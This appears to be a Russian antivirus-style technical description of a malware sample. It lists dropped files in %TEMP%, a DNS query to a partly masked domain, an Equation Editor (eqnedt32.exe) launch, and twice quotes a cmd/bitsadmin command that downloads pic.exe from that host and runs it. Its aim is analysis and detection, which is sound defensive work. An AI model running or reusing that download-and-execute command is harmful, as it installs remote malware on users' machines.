Техническая информация
- Средство контроля пользовательских учетных записей (UAC)
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download http://tu####der.com.tr.ht/pic.exe %temp%\Lo.Exe&%temp%\Lo.Exe
- Библиотека-обработчик для всех процессов: %TEMP%\ntdtcstp.dll
- %TEMP%\bita86c.tmp
- %WINDIR%\vmpipe32.dll
- %TEMP%\ntdtcstp.dll
- %TEMP%\cmsetac.dll
- %TEMP%\bita86c.tmp
- %TEMP%\bita86c.tmp в %TEMP%\lo.exe
- 'tu####der.com.tr.ht':80
- http://tu####der.com.tr.ht/pic.exe
- DNS ASK tu####der.com.tr.ht
- '%TEMP%\lo.exe'
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download http://tu####der.com.tr.ht/pic.exe %temp%\Lo.Exe&%temp%\Lo.Exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 /download http://tu####der.com.tr.ht/pic.exe %TEMP%\Lo.Exe